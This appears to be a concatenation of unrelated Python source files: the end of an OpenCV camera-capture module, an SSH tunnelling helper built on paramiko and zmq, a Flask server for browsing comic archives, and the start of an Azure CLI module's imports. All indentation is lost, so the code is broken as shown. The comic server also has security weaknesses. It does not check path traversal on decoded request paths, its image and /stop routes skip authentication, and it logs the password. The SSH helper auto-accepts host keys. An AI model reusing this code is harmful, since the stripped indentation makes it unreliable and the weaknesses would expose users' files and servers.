if self.cam.set(cv2.CAP_PROP_BUFFERSIZE, val):
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Buffersize:{}".format(val)))
self._buffersize = int(self.cam.get(cv2.CAP_PROP_BUFFERSIZE))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set buffer size to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set buffersize, camera not open!"))
###############################################################################
# Testing
###############################################################################
if __name__ == '__main__':
configs = {
'camera_res' : (1280, 720 ), # width & height
'exposure' : -2, # -1,0 = auto, 1...max=frame interval,
'autoexposure' : 1, # depends on camera: 0.25 or 0.75(auto) or 1(auto), -1, 0
'fps' : 30, # 15, 30, 40, 90, 120, 180
'fourcc' : -1, # n.a.
'buffersize' : -1, # n.a.
'output_res' : (-1, -1), # Output resolution, -1,-1 no change
'flip' : 0, # 0=norotation
# 1=ccw90deg
# 2=rotation180
# 3=cw90
# 4=horizontal
# 5=upright diagonal flip
# 6=vertical
# 7=uperleft diagonal flip
'displayfps' : 30 # frame rate for display server
}
if configs['displayfps'] >= configs['fps']: display_interval = 0
else: display_interval = 1.0/configs['displayfps']
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("Capture")
logger.log(logging.DEBUG, "Starting Capture")
camera = cv2Capture(configs,camera_num=0)
camera.start()
logger.log(logging.DEBUG, "Getting Frames")
window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
last_display = time.perf_counter()
stop = False
while(not stop):
current_time = time.perf_counter()
while not camera.log.empty():
(level, msg) = camera.log.get_nowait()
logger.log(level, "{}".format(msg))
(frame_time, frame) = camera.capture.get(block=True, timeout=None)
if (current_time - last_display) >= display_interval:
cv2.imshow('Camera', frame)
last_display = current_time
if cv2.waitKey(1) & 0xFF == ord('q'): stop=True
#try:
# if cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 0:
# stop = True
#except:
# stop = True
camera.stop()
cv2.destroyAllWindows()
|
ssh_com.py
|
import logging
import signal
import platform
import paramiko
import json
import os
from pathlib import Path
import subprocess
import threading
import zmq.ssh
class SSHCom:
def __init__(self, worker_exec=None, local_server_id=None, remote_server_id=None,
ssh_local_ip=None, ssh_local_username=None, ssh_local_password=None):
if worker_exec is not None:
self.local_server_id = local_server_id
self.remote_server_id = remote_server_id
self.worker_exec = worker_exec
self.local_server_info = self.get_ssh_server_info(self.local_server_id)
self.remote_server_info = self.get_ssh_server_info(self.remote_server_id)
if ssh_local_ip is not None:
self.ssh_local_ip = ssh_local_ip
self.ssh_local_username = ssh_local_username
self.ssh_local_password = ssh_local_password
self.client = None
self.setup_client()
self.stdout = None
self.stderr = None
self.tunnelling_processes_pids = []
def setup_client(self):
try:
pass
self.client = paramiko.SSHClient()
self.client.load_host_keys(os.path.expanduser('~/.ssh/known_hosts'))
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
except Exception as e:
print('Starting paramiko client failed with error {}'.format(e))
@staticmethod
def get_ssh_server_info(id):
"""
Reads the ssh_info.json file and returns the dictionary that has the info for the ssh server with the given id
:param id: A string of an int that represents the unique id of the ssh_info.json server entry
:return: The dict that carries the info of the specified server (IP, port, username and password)
"""
ssh_info_file = os.path.join(Path(os.path.dirname(os.path.realpath(__file__))), 'ssh_info.json')
with open(ssh_info_file) as f:
ssh_info = json.load(f)
result = {}
if id != 'None':
result = ssh_info[id]
else:
result['IP'] = result['Port'] = result['username'] = result['password'] = 'None'
return result
def connect_socket_to_local(self, socket, socket_ip, socket_port, skip_ssh=False):
"""
Connects a socket to an IP and a port at the computer that is running the editor (local). It has three possible
behaviours:
1) If the node hasn't been set up as a remote node (i.e. has not been given the ip addresses for an SSH remote
and an SSH local server) then the worker function runs locally and the socket is connected to the local ip
(probably 127.0.0.1) and the correct port for the job.
2) If the node is a remote running node (i.e. has ip addresses for the SSH remote and SSH local servers) then
it has two possible behaviours:
2a) If there is no local SSH running (denoted by the password of the local SSH server being None) then
the socket is connected ("normally") to the ip address of the local computer (i.e. the ip address of the
local SSH server given on the node's extra info) and the corresponding port for the job.
2b) If there is a local SSH server actually running (there is a password associated with it in the SSH
info page of the editor) then the socket is connected through an ssh tunnel
:param socket: The socket to connect
:param socket_ip: The localhost ip address used by Heron (probably 127.0.0.1)
:param socket_port: The port to connect to
:param skip_ssh: If true then the connection doesn't use an ssh tunnel even if there is an SSH server running
locally. This is used for the case of sockets that do proof of life (and connect to the local proof of life
forwarder).
:return: Nothing
"""
if self.ssh_local_ip == 'None':
socket.connect("{}:{}".format(socket_ip, socket_port))
else:
logging.debug('== Connecting back to local (computer running editor) with port : {}'.format(socket_port))
try:
if self.ssh_local_password == 'None' or skip_ssh:
logging.debug('=== Using normal sockets (not SSH) connecting to tcp://{}:{}'
.format(self.ssh_local_ip, socket_port))
socket.connect(r"tcp://{}:{}".format(self.ssh_local_ip, socket_port))
else:
logging.debug('=== Using SSH connecting to {} -> {}:{}'.
format(self.ssh_local_ip, socket_ip, socket_port))
tunneling_process = zmq.ssh.tunnel_connection(socket, '{}:{}'.format(socket_ip, socket_port),
"{}@{}".format(self.ssh_local_username,
self.ssh_local_ip),
password=self.ssh_local_password,
paramiko=True)
logging.debug('PID of generated tunneling process = {}'.format(tunneling_process.pid))
self.tunnelling_processes_pids.append(tunneling_process.pid)
except Exception as e:
logging.debug("=== Failed to connect with error: {}".format(e))
finally:
logging.debug('=== Connected')
def connect_socket_to_remote(self, socket, socket_ip):
if self.remote_server_id != 'None':
logging.debug('ssh remote with port : {}'.format(socket_ip))
tunnelling_pid = zmq.ssh.tunnel_connection(socket, socket_ip, "{}@{}".
format(self.remote_server_info['username'],
self.remote_server_info['IP']),
password=self.remote_server_info['password'],
paramiko=True)
logging.debug(tunnelling_pid)
self.tunnelling_processes_pids.append(tunnelling_pid.pid)
def add_local_server_info_to_arguments(self, arguments_list):
arguments_list.append(self.local_server_info['IP'])
arguments_list.append(self.local_server_info['username'])
arguments_list.append(self.local_server_info['password'])
return arguments_list
def list_to_string(self, list):
result = ''
for arg in list:
result += '{} '.format(arg)
return result[:-1]
def remote_stderr_thread(self):
for line in self.stderr:
print('// REMOTE COMPUTER {} ERROR: {}'.format(self.remote_server_info['IP'], line))
def remote_stdout_thread(self):
for line in self.stdout:
print('// REMOTE COMPUTER {} SAYS: {}'.format(self.remote_server_info['IP'], line))
def start_process(self, arguments_list):
if self.remote_server_id == 'None':
if len(arguments_list[0].split(' ')) > 1:
new_arguments_list = arguments_list[0].split(' ')
for i in range(1, len(arguments_list)):
new_arguments_list.append(arguments_list[i])
else:
new_arguments_list = arguments_list
return subprocess.Popen(new_arguments_list, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP).pid
else:
self.client.connect(self.remote_server_info['IP'],
int(self.remote_server_info['Port']),
self.remote_server_info['username'],
self.remote_server_info['password'])
stdin, self.stdout, self.stderr = self.client.exec_command(self.list_to_string(arguments_list))
stderr_thread = threading.Thread(target=self.remote_stderr_thread, daemon=True)
stdout_thread = threading.Thread(target=self.remote_stdout_thread, daemon=True)
stderr_thread.start()
stdout_thread.start()
return 'Remote unknown pid'
def kill_tunneling_processes(self):
logging.debug('KILLING THE PROCESSES {}'.format(self.tunnelling_processes_pids))
if platform.system() == 'Windows':
signal_to_send = signal.SIGBREAK
elif platform.system() == 'Linux':
signal_to_send = signal.SIGTERM
for pid in self.tunnelling_processes_pids:
os.kill(pid, signal_to_send)
pid = os.getpid()
os.kill(pid, signal_to_send)
|
lightcomics.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
import json
import zipfile
import struct
import imghdr
import platform
import logging
import chardet
import flask
import re
import socket
import threading
import requests
from flask import request
from PIL import Image
from io import BytesIO
from werkzeug.routing import BaseConverter
from functools import wraps
from io import StringIO
import tkinter as tk
from tkinter import filedialog
from tkinter import messagebox
from urllib.request import urlopen
from urllib.parse import unquote
import importlib
RAR_FILE_SPEC = importlib.util.find_spec("rarfile")
IS_INSTALLED_RAR_FILE_MODULE = RAR_FILE_SPEC is not None
if IS_INSTALLED_RAR_FILE_MODULE:
import rarfile
# 버전
__version__ = (1, 0, 3)
# 변수 설정
EXTENSIONS_ALLOW_IMAGE = ['JPG', 'GIF', 'PNG', 'TIF', 'BMP', 'JPEG', 'TIFF']
EXTENSIONS_ALLOW_ARCHIVE = ['ZIP', 'CBZ']
if IS_INSTALLED_RAR_FILE_MODULE:
EXTENSIONS_ALLOW_ARCHIVE = EXTENSIONS_ALLOW_ARCHIVE + ['RAR', 'CBR']
EXTENSIONS_ALLOW = EXTENSIONS_ALLOW_IMAGE + EXTENSIONS_ALLOW_ARCHIVE
# 로거 설정
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# 운영체제 변수
IS_OS_WINDOWS = sys.platform == 'win32'
IS_OS_MACOSX = sys.platform == 'darwin'
IS_OS_LINUX = sys.platform == 'linux'
# 설정
DEFAULT_PORT = 12370
CONF_ROOT_PATH = ""
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
CONF_HOST = "0.0.0.0"
BASE_MIME_TYPE = "application/json"
if IS_OS_WINDOWS:
CONF_ROOT_PATH = "c:/"
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
elif IS_OS_MACOSX:
CONF_ROOT_PATH = "/"
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
elif IS_OS_LINUX:
CONF = json.loads(open('./lightcomics.json', 'r').read())
CONF_ROOT_PATH = CONF['ROOT']
CONF_SERVER_PORT = CONF['PORT']
CONF_PASSWORD = CONF['PASSWORD']
CONF_HOST = CONF['HOST']
if not os.path.exists(CONF_ROOT_PATH):
print("루트 디렉토리를 찾을 수 없습니다. lightcomics.json 파일의 ROOT 경로를 확인해주세요.")
exit(0)
else:
print("운영체제를 확인할 수 없습니다.")
exit(0)
# 앱 선언
app = flask.Flask(__name__)
# 권한 체크
def authention_validate(username, password):
return username == 'LightComics' and password == CONF_PASSWORD
# 권한 오류 반환
def authenticate():
return flask.Response('You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
# 권한 요구
def requires_authenticate(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = flask.request.authorization
if not auth or not authention_validate(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
# JSON Encoder
class LightEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
# Identifier 모델
class BaseIdentifierModel(LightEncoder):
def __init__(self):
self._path = ""
self._identifier = ""
# 이미지 모델
class BaseImageModel(LightEncoder):
def __init__(self):
self._name = ""
self._decode_name = ""
self._width = -1
self._height = -1
# 리스팅 모델
class BaseListingModel(LightEncoder):
def __init__(self):
self._root = CONF_ROOT_PATH
self._directories = []
self._archives = []
self._images = []
# 함수
def fix_str(str):
""" 깨진 문자열을 복원하여 반환한다 """
name = str
try:
name = name.encode('cp437').decode('cp949')
except UnicodeDecodeError:
name = name.encode('utf8')
encoding = chardet.detect(name)['encoding']
name = name.decode(encoding)
return name
def get_image_size_from_bytes(head):
""" 이미지 사이즈를 반환한다 """
try:
im = Image.open(head)
return im.size
except ValueError:
return 0, 0
except TypeError:
return 0, 0
def is_hidden_or_trash(full_path):
""" 숨김 파일 또는 __MACOSX 디렉토리인지 확인한다. """
if 'DS_STORE' in full_path:
return True
elif '__MACOSX' in full_path:
return True
else:
return False
def get_extension(file_name):
""" 확장자를 반환한다. (숨김파일 또는 MACOSX파일의 경우 확장자를 반환하지 않는다.) """
extension = os.path.splitext(file_name)[-1]
if extension.startswith('.'):
extension = extension[1:]
if is_hidden_or_trash(extension):
return ''
return extension
def is_extensions_allow_image(file_name):
""" 허용된 이미지 확장자인 경우 True를 반환한다 """
extension = get_extension(file_name)
if extension.upper() not in EXTENSIONS_ALLOW_IMAGE:
return False
else:
return True
def is_extensions_allow_archive(file_name):
""" 허용된 압축파일 확장자인 경우 True를 반환한다 """
extension = get_extension(file_name)
if extension.upper() not in EXTENSIONS_ALLOW_ARCHIVE:
return False
else:
return True
def get_imagemodel_in_dir(dir_path, mode):
""" 디렉토리의(dir_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
for name in os.listdir(dir_path):
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = os.path.join(dir_path, name).replace("\\", "/")
if mode == "1":
with open(model._name, mode='rb') as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
image_models.append(model)
return image_models
def get_imagemodel_in_zip(zip_path, mode):
""" 압축파일(zip_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
with zipfile.ZipFile(zip_path) as zf:
for name in zf.namelist():
if is_hidden_or_trash(name):
continue
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = name
model._decode_name = fix_str(name)
if mode == "1":
with zf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
image_models.append(model)
return image_models
def get_imagemodel_in_rar(rar_path, mode):
""" 압축파일(rar_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
with rarfile.RarFile(rar_path) as rf:
for name in rf.namelist():
if is_hidden_or_trash(name):
continue
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = name
app.logger.info("fileName: " + name)
if mode == "1":
try:
with rf.read(name) as f:
data = BytesIO()
data.write(f)
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
except Exception:
app.logger.error("Can not getting width, height >> " + name)
image_models.append(model)
return image_models
def get_image_data_in_dir(file_path):
""" 이미지 파일(file_path)의 데이터를 반환한다. """
with open(file_path, mode='rb') as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
def get_image_data_in_zip(zip_path, file_path):
""" 압축 파일(zip_path)에서 이미지 파일(file_path)의 데이터를 반환한다. """
with zipfile.ZipFile(zip_path) as zf:
for name in zf.namelist():
if name == file_path and is_extensions_allow_image(name):
with zf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
def get_image_data_in_rar(rar_path, file_path):
""" 압축 파일(rar_path)에서 이미지 파일(file_path)의 데이터를 반환한다. """
with rarfile.RarFile(rar_path) as rf:
for name in rf.namelist():
if name == file_path and is_extensions_allow_image(name):
try:
with rf.read(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
except Exception:
app.logger.error("Canot open fileName: " + name)
def get_listing_model(path):
""" 리스팅 """
listing_model = BaseListingModel()
for name in os.listdir(path):
full_path = os.path.join(path, name).replace("\\", "/")
if os.path.isdir(full_path):
listing_model._directories.append(full_path)
elif is_extensions_allow_archive(full_path):
listing_model._archives.append(full_path)
elif is_extensions_allow_image(full_path):
listing_model._images.append(full_path)
else:
app.logger.info(name + " ignore")
return listing_model
def get_unique_identifier(path):
""" path에 해당하는 고유값을 생성하여 반환한다 """
path = remove_trail_slash(path)
createdate = int(os.stat(path).st_ctime)
filesize = int(get_size_of(path))
app.logger.info("createdate: " + str(createdate))
app.logger.info("filesize: " + str(filesize))
uniqueue_identifier = str(createdate + filesize)
app.logger.info(uniqueue_identifier)
return uniqueue_identifier
def get_real_path(base, abs_path):
""" 실제 경로를 반환한다 """
abs_path = unquote(abs_path)
if abs_path == "":
return base
real_path = os.path.join(base, abs_path).replace("\\", "/")
return real_path
def remove_trail_slash(s):
""" 마지막 slash를 제거한다 """
if s.endswith('/'):
s = s[:-1]
return s
def get_size_of(path):
""" 해당 경로 파일 또는 디렉토리의 사이즈를 구하여 반환한다 """
total_size = os.path.getsize(path)
if os.path.isdir(path) == False:
return total_size
for item in os.listdir(path):
itempath = os.path.join(path, item).replace("\\", "/")
if os.path.isfile(itempath):
total_size += os.path.getsize(itempath)
elif os.path.isdir(itempath):
total_size += get_size_of(itempath)
return total_size
# Flask 네트워크 맵핑 시작
@app.route('/')
@requires_authenticate
def root():
"""
리스팅
localhost:12370/
"""
app.logger.info("@app.route('/')")
return rest_listing("")
@app.route('/<path:req_path>/')
@requires_authenticate
def rest_listing(req_path):
"""
리스팅
localhost:12370/req_path/
"""
app.logger.info("@app.route('/<path:req_path>/')")
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
model = get_listing_model(full_real_path)
data = json.dumps(model, indent=4, cls=LightEncoder)
response = flask.Response(data, headers=None, mimetype=BASE_MIME_TYPE)
return response
@app.route('/<string:archive>.<string:archive_ext>/')
@requires_authenticate
def rest_load_image_model(archive, archive_ext):
"""
압축파일 내부 이미지 정보
localhost:12370/sample.zip/
"""
app.logger.info("@app.route('/<string:archive>.<string:archive_ext>/')")
return rest_load_image_model2("", archive, archive_ext)
@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/')
@requires_authenticate
def rest_load_image_model2(req_path, archive, archive_ext):
"""
압축파일 내부 이미지 정보
localhost:12370/dir/sglee/sample.zip/
"""
app.logger.info(
"@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/')"
)
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
archive_name = "%s" % unquote(archive) + "." + archive_ext
archive_path = os.path.join(full_real_path,
archive_name).replace("\\", "/")
app.logger.info(archive_path)
mode = request.args.get('mode', "0")
app.logger.info("mode: " + mode)
if archive_ext.upper() == 'ZIP' or archive_ext.upper() == 'CBZ':
models = get_imagemodel_in_zip(archive_path, mode)
data = json.dumps(models, indent=4, cls=LightEncoder)
response = flask.Response(data,
headers=None,
mimetype=BASE_MIME_TYPE)
return response
elif archive_ext.upper() == 'RAR' or archive_ext.upper() == 'CBR':
models = get_imagemodel_in_rar(archive_path, mode)
data = json.dumps(models, indent=4, cls=LightEncoder)
response = flask.Response(
data, headers=None, mimetype=BASE_MIME_TYPE)
return response
return ('', 204)
@app.route('/<string:archive>.<string:archive_ext>/<path:img_path>')
def rest_load_image_data(archive, archive_ext, img_path):
"""
압축파일 내부 이미지 데이터 반환
localhost:12370/sample.zip/img1.jpg
localhost:12370/sample.zip/test/img1.jpg
"""
app.logger.info(
"@app.route('/<string:archive>.<string:archive_ext>/<path:img_path>')")
return rest_load_image_data2("", archive, archive_ext, img_path)
@app.route(
'/<path:req_path>/<string:archive>.<string:archive_ext>/<path:img_path>')
def rest_load_image_data2(req_path, archive, archive_ext, img_path):
"""
압축파일 내부 이미지 데이터 반환
localhost:12370/dir/sglee/sample.zip/img1.jpg
localhost:12370/dir/sglee/sample.zip/test/img1.jpg
"""
app.logger.info(
"@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/<path:img_path>')"
)
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
archive_name = "%s" % unquote(archive) + "." + archive_ext
archive_path = os.path.join(full_real_path,
archive_name).replace("\\", "/")
app.logger.info(archive_path)
img_path = unquote(img_path)
app.logger.info(img_path)
if archive_ext.upper() == 'ZIP' or archive_ext.upper() == 'CBZ':
img = get_image_data_in_zip(archive_path, img_path)
return flask.send_file(img,
attachment_filename=os.path.basename(img_path),
as_attachment=True)
if archive_ext.upper() == 'RAR' or archive_ext.upper() == 'CBR':
img = get_image_data_in_rar(archive_path, img_path)
return flask.send_file(img,
attachment_filename=os.path.basename(img_path),
as_attachment=True)
return ('', 204)
@app.route('/id/<path:req_path>')
@requires_authenticate
def rest_get_identifier(req_path):
"""
해당하는 경로의 파일 identifier를 반환한다.
localhost:12370/dir/hello.zip
"""
app.logger.info("@app.route('/id/<path:req_path>')")
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
model = BaseIdentifierModel()
model._path = remove_trail_slash(full_real_path)
model._identifier = get_unique_identifier(full_real_path)
data = json.dumps(model, indent=4, cls=LightEncoder)
response = flask.Response(data, headers=None, mimetype=BASE_MIME_TYPE)
return response
@app.route('/stop')
def rest_stop_server_by_request():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
app.logger.info("shutdown...")
func()
app.logger.info("shutdown...")
# UI 구현 for Windows or Mac OSX
server_run = False
def on_click_server_state():
global server_run
global server_state_label
global server_on_off_button
if server_run == True:
shutdown_server()
server_state_label['text'] = "서버: 정지됨"
server_on_off_button['text'] = " 가동 "
server_port_textbox.configure(state="normal")
password_textbox.configure(state="normal")
else:
update_server_port()
update_password()
server_threading = threading.Thread(target=start_server)
server_threading.start()
server_state_label['text'] = "서버: 가동중"
server_on_off_button['text'] = " 정지 "
server_port_textbox.configure(state="disabled")
password_textbox.configure(state="disabled")
server_run = not server_run
def start_server():
app.logger.info("Server Start: " + str(CONF_SERVER_PORT))
host = local_ip.get()
if IS_OS_MACOSX:
host = "0.0.0.0" # check after
app.run(host=host, port=CONF_SERVER_PORT)
def shutdown_server():
URL = "http://" + CONF_HOST + ":" + str(CONF_SERVER_PORT) + "/stop"
requests.get(URL)
app.logger.info("Sever Stopped")
def get_public_ip():
data = str(urlopen('http://checkip.dyndns.com/').read())
return re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
def update_server_ip():
global CONF_HOST
app.logger.info(get_public_ip())
CONF_HOST = socket.gethostbyname(socket.gethostname())
local_ip.set(socket.gethostbyname(socket.gethostname()))
public_ip.set(get_public_ip())
def update_server_port():
global CONF_SERVER_PORT
CONF_SERVER_PORT = int(server_port.get())
app.logger.info(CONF_SERVER_PORT)
def update_password():
global CONF_PASSWORD
CONF_PASSWORD = password_var.get()
app.logger.info(CONF_PASSWORD)
def update_root_path():
global CONF_ROOT_PATH
if server_run == True:
tk.messagebox.showinfo("알림", "서버 가동중에 경로를 변경할 수 없습니다.")
return
folder_selected = filedialog.askdirectory()
CONF_ROOT_PATH = folder_selected
root_path_var.set(CONF_ROOT_PATH)
app.logger.info(CONF_ROOT_PATH)
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
# Set UI values for Windows
if IS_OS_WINDOWS or IS_OS_MACOSX:
window = tk.Tk()
server_state_label = tk.Label(
window, text="서버: 중지됨", width=15, anchor="w", padx=10, pady=5)
server_on_off_button = tk.Button(
window, text=" 가동 ", command=on_click_server_state, width=20, foreground="black")
change_root_path_button = tk.Button(
window, text=" 변경 ", command=update_root_path, width=20)
public_ip = tk.StringVar()
local_ip = tk.StringVar()
server_port = tk.StringVar()
server_port.set(CONF_SERVER_PORT)
password_var = tk.StringVar()
password_var.set(CONF_PASSWORD)
root_path_var = tk.StringVar()
root_path_var.set(CONF_ROOT_PATH)
local_ip_textbox = tk.Entry(
window, width=20, textvariable=local_ip, state='readonly')
public_ip_textbox = tk.Entry(
window, width=20, textvariable=public_ip, state='readonly')
server_port_textbox = tk.Entry(
window, width=20, textvariable=server_port)
password_textbox = tk.Entry(
window, width=20, textvariable=password_var)
root_path_textbox = tk.Entry(
window, width=20, textvariable=root_path_var, state='readonly')
def application_userinterface():
global window
global server_state_label
global server_on_off_button
global public_ip
if IS_OS_WINDOWS:
window.geometry("300x200")
else:
window.geometry("350x250")
window.title("Light Provider")
window.resizable(False, False)
if IS_OS_WINDOWS:
window.iconbitmap(default=resource_path('icon.ico'))
reuse_label = tk.Label(window, text=" ", width=15, anchor="w")
reuse_label.grid(row=0, column=0)
server_state_label.grid(row=1, column=0)
server_on_off_button.grid(row=1, column=1)
reuse_label = tk.Label(window, text="Local IP", width=15, anchor="w")
reuse_label.grid(row=2, column=0)
local_ip_textbox.grid(row=2, column=1)
reuse_label = tk.Label(window, text="Remote IP", width=15, anchor="w")
reuse_label.grid(row=3, column=0)
public_ip_textbox.grid(row=3, column=1)
reuse_label = tk.Label(window, text="서버 Port", width=15, anchor="w")
reuse_label.grid(row=4, column=0)
server_port_textbox.grid(row=4, column=1)
reuse_label = tk.Label(window, text="비밀번호", width=15, anchor="w")
reuse_label.grid(row=5, column=0)
password_textbox.grid(row=5, column=1)
reuse_label = tk.Label(window, text="공유 폴더", width=15, anchor="w")
reuse_label.grid(row=6, column=0)
root_path_textbox.grid(row=6, column=1)
reuse_label = tk.Label(window, text="폴더 변경", width=15, anchor="w")
reuse_label.grid(row=7, column=0)
change_root_path_button.grid(row=7, column=1)
update_server_ip()
window.mainloop()
# 앱 시작
if __name__ == '__main__':
if IS_OS_WINDOWS or IS_OS_MACOSX:
application_userinterface()
elif IS_OS_LINUX:
app.run(host=CONF_HOST, port=CONF_SERVER_PORT)
else:
print("운영체제를 알 수 없습니다.")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ArgumentUsageError,
ClientRequestError,
InvalidArgumentValueError,
ValidationError)
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_09_01.models import AgentPool
from azure.mgmt.containerservice.v2020_09_01.models import AgentPoolUpgradeSettings
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentityUserAssignedIdentitiesValue
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_managed_clusters
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
